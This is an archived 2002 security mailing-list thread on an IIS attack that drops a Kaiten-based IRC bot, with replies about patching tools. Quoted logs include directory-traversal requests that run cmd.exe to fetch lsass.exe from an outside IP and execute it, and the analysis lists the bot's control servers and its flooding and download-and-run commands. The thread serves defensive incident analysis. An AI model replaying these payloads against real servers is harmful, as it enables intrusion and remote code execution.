Security Incidents mailing list archives

RE: new IIS worm? (rcp lsass.exe)

From: "John Campbell" <jcampbell () wsipc org>
Date: Tue, 24 Sep 2002 14:41:28 -0700

I actually prefer the opportunity to pick and choose.  Not all hotfixes
are necessary for a given installation, and historically at least, they
aren't regression-tested as fully as services packs, (which aren't
always perfect when they hit the street either.)

If you do a lot of servers, it may make sense to set one up manually,
test it thoroughly, then clone it with a disk imaging tool.

-----Original Message-----
From: zeno [mailto:bugtraq () cgisecurity net] 
Sent: Tuesday, September 24, 2002 2:08 PM
To: John Campbell
Cc: incidents () securityfocus com
Subject: Re: new IIS worm? (rcp lsass.exe)


Windows Update from you-know-who actually does what you describe.  I'd

always been leery of it, but tried it out recently when setting up a 
W2K test server, and it performed as advertised.  It did take several 
iterations to get everything updated, owing to various dependencies.


When I used windows update it downloaded the patches but didn't install
them. I had to manually go through each one. While this isn't a big deal
I am looking for something 100 percent automated with install of the
patches. Perhaps I'm missing something I deal mostly with unix.

- zeno


Regards,

John Campbell, CISSP, GCWN
Information Security Engineer
Washington School Information Processing Cooperative
(WSIPC)
Everett, Washington, USA

-----Original Message-----
From: zeno [mailto:bugtraq () cgisecurity net]
Sent: Tuesday, September 24, 2002 11:29 AM
To: Mark Challender
Cc: 'pj () esec dk'; incidents () securityfocus com
Subject: Re: new IIS worm? (rcp lsass.exe)


Hardening of IIS with the tools available at Microsoft and using
URLSCAN with the EXE blocking on will stop these attacks.

Patch, patch, patch, recheck the patches and use URLSCAN!


Does anyone know of a gui windows tool that scans your system and 
provides you with a list of needed patches, and then allows you to 
select, and have it autodownload and install them? I can't seem to 
find one (needed mostly for iis).

- zeno () cgisecurity com


Mark Challender
Network Administrator

==================
Veni, Vidi, Geeki
==================


-----Original Message-----
From: pj () esec dk [mailto:pj () esec dk]
Sent: Monday, September 23, 2002 3:27 AM
To: incidents () securityfocus com
Subject: Re: new IIS worm? (rcp lsass.exe)



Christian Mock:

Then it seems to go after the web servers, sending the following:

GET

/scripts/..%5c..%5cwinnt/system32/cmd.exe?/c+rcp+-b+64.21.95.7.lp:ls
as
s.exe+
.
 HTTP/1.0..

and

GET /scripts/..%5c..%5cwinnt/system32/cmd.exe?/c+lsass.exe HTTP/1.0

I've been able to get hold of that lsass.exe binary (9728 bytes), 
but

I lack the skills to analyze it; I'll happily mail it to anybody 
who
asks.



We have seen this attack from 4 different sources since Sept. 16, 
and
have informed the owner of 64.21.95.7 and downloaded the lsass.exe

for

investigation.

Based on the attack rate this is most likely a scripted or manual
attack, not a worm.

Judging from  the embedded string in this compressed binary  it
appears to be an IRC bot  based on the kaiten.c code written by 
contem@efnet, the author of the Slapper worm :

Kaiten Win32 API version 2002 by contem@efnet

The binary  contains these domainnames, most likeky IRC servers used
for controlling the bot:

telsa5.mine.nu (Korea)
irc.logicfive.net (Taiwan)
moncredo.shacknet.nu (USA)
telsacredo.shacknet.nu (USA)
lar.ath.cx (Taiwan)

The program accepts commands to make various DOS attacks or download
new version or executables with http:

NOTICE %s :PUSH <target> <port> <secs>   = A push flooder
NOTICE %s :TCP <target> <port> <secs>    = A syn flooder
NOTICE %s :UDP <target> <port> <secs>    = A udp flooder
NOTICE %s :MCON <target> <port> <times>  = A connectbomb flooder
NOTICE %s :NICK <nick>                   = Changes the nick of the

client

NOTICE %s :DISABLE <pass>                = Disables all packeting

from

this

client
NOTICE %s :ENABLE <pass>                 = Enables all packeting

from

this

client
NOTICE %s :UPDATE <http address>         = Downloads a file off the

web and

updates the client
NOTICE %s :RUN <http address>            = Downloads a file off the

web and

runs it
NOTICE %s :GET <http address>            = Downloads a file off the

web

NOTICE %s :ADDSERVER <server>            = Adds a server to the list
NOTICE %s :DELSERVER <server>            = Deletes a server from the

list

NOTICE %s :LISTSERVERS                   = Lists server on the list
NOTICE %s :KILL                          = Kills the client
NOTICE %s :VERSION                       = Requests version of

client

NOTICE %s :HELP                          = Displays this


There seems also to be a default account and password in the german
language included in this specific version of Kaiten.

The IIS attack that tries to inject this Trojan usually has another
URL with "CONNECT chat.vtm.be:6667".  This is an attempt to proxy an

connection to port 6667(IRC) on chat.vtm.be.



Peter Jelver
...

eSec A/S

http://www.esec.dk

......................................................................

......
.

PGP Fingerprint : 47AF FFEC D48F 9C13 0C4F  E687 BB8A 128F D85C A7D7





--------------------------------------------------------------------
--
------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management 
and tracking system please see: http://aris.securityfocus.com

--------------------------------------------------------------------
--
------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management 
and tracking system please see: http://aris.securityfocus.com



----------------------------------------------------------------------
--
----
This list is provided by the SecurityFocus ARIS analyzer service. For
more information on this free incident handling, management 
and tracking system please see: http://aris.securityfocus.com



----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management
and tracking system please see: http://aris.securityfocus.com

Current thread:

Re: new IIS worm? (rcp lsass.exe), (continued)
- - Re: new IIS worm? (rcp lsass.exe) James Williams (Sep 24)
  - RE: new IIS worm? (rcp lsass.exe) Ben Timby (Sep 24)
  - Re: new IIS worm? (rcp lsass.exe) sunzi (Sep 25)
  - Re: new IIS worm? (rcp lsass.exe) Nick FitzGerald (Sep 25)
    - Re: new IIS worm? (rcp lsass.exe) Faisal Ashraf (Sep 26)
  - Re: new IIS worm? (rcp lsass.exe) Christoph Puppe (Sep 25)
- Re: new IIS worm? (rcp lsass.exe) zeno (Sep 24)
- RE: new IIS worm? (rcp lsass.exe) John Campbell (Sep 24)
- RE: new IIS worm? (rcp lsass.exe) Dostie, Joe (Sep 25)
- RE: new IIS worm? (rcp lsass.exe) webbi (Sep 25)
- RE: new IIS worm? (rcp lsass.exe) John Campbell (Sep 25)
- Re: new IIS worm? (rcp lsass.exe) zeno (Sep 25)
- RE: new IIS worm? (rcp lsass.exe) Gaydosh, Adam (Sep 25)
- RE: new IIS worm? (rcp lsass.exe) David LeBlanc (Sep 26)
- RE: new IIS worm? (rcp lsass.exe) Dallas Jordan (Sep 26)
- RE: new IIS worm? (rcp lsass.exe) Bax . Plemons (Sep 26)
- Re: new IIS worm? (rcp lsass.exe) Muhammad Faisal Rauf Danka (Sep 27)